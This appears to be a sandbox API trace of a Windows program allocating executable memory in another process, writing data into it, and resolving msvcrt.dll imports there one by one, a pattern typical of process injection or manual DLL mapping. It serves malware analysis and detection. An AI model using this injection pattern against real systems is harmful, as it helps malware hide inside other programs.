	[0153.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.870] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.870] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.870] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.871] ResetEvent (hEvent=0x268) returned 1
	[0153.871] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.871] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.871] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.871] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004080, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.872] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.872] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.872] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.872] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.872] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.872] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.872] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.873] ResetEvent (hEvent=0x268) returned 1
	[0153.873] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.873] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.873] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.873] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004084, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.873] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.874] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.874] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.874] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.874] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.874] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.874] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.874] ResetEvent (hEvent=0x268) returned 1
	[0153.874] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.875] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.875] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.875] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.875] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004088, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.875] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.875] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.875] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.875] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.875] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.876] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.876] ResetEvent (hEvent=0x268) returned 1
	[0153.876] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.876] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.876] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.876] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.876] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x1000408c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.877] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.877] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0153.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d0404, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0153.877] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d0404, cbMultiByte=-1, lpWideCharStr=0x23079d8, cchWideChar=11 | out: lpWideCharStr="msvcrt.dll") returned 11
	[0153.877] lstrlenW (lpString="msvcrt.dll") returned 10
	[0153.877] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.877] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x23079d8*, nSize=0x16, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23079d8*, lpNumberOfBytesWritten=0x12857c*=0x16) returned 1
	[0153.878] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0153.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.878] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.878] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0153.878] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0153.878] ResetEvent (hEvent=0x268) returned 1
	[0153.878] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.879] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0153.879] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.879] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.879] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.879] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0153.879] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.879] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.879] lstrlenA (lpString="_except_handler4_common") returned 23
	[0153.879] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.879] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0464*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0464*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0153.880] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.880] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.880] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.880] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.881] ResetEvent (hEvent=0x268) returned 1
	[0153.881] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.881] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.881] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.881] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.881] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.881] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x1000409c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.882] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.882] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.882] lstrlenA (lpString="??2@YAPAXI@Z") returned 12
	[0153.882] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.882] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d03e6*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d03e6*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0153.882] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.882] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.882] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.882] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.883] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.883] ResetEvent (hEvent=0x268) returned 1
	[0153.883] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.883] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.883] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.883] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.883] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.883] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040a0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.884] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.884] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.884] lstrlenA (lpString="_amsg_exit") returned 10
	[0153.884] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.884] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0456*, nSize=0xb, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0456*, lpNumberOfBytesWritten=0x12857c*=0xb) returned 1
	[0153.884] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.885] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.885] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.885] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.885] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.885] ResetEvent (hEvent=0x268) returned 1
	[0153.885] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.886] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.886] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.886] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.886] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.886] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040a4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.886] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.886] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.886] lstrlenA (lpString="_initterm") returned 9
	[0153.886] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.887] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d044a*, nSize=0xa, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d044a*, lpNumberOfBytesWritten=0x12857c*=0xa) returned 1
	[0153.887] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.887] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.887] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.887] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.887] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.888] ResetEvent (hEvent=0x268) returned 1
	[0153.888] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.888] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.888] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.888] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.888] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.888] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040a8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.889] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.889] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.889] lstrlenA (lpString="free") returned 4
	[0153.889] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.889] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0442*, nSize=0x5, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0442*, lpNumberOfBytesWritten=0x12857c*=0x5) returned 1
	[0153.889] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.889] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.889] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.889] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.890] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.890] ResetEvent (hEvent=0x268) returned 1
	[0153.890] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.890] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.890] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.890] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.890] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.890] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040ac, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.891] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.891] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.891] lstrlenA (lpString="malloc") returned 6
	[0153.891] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.891] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0438*, nSize=0x7, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0438*, lpNumberOfBytesWritten=0x12857c*=0x7) returned 1
	[0153.892] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.892] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.892] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.892] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.892] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.892] ResetEvent (hEvent=0x268) returned 1
	[0153.892] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.893] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.893] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.893] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.893] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.893] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040b0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.893] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.893] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.893] lstrlenA (lpString="_XcptFilter") returned 11
	[0153.893] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.894] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d042a*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d042a*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0153.894] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.894] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.894] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
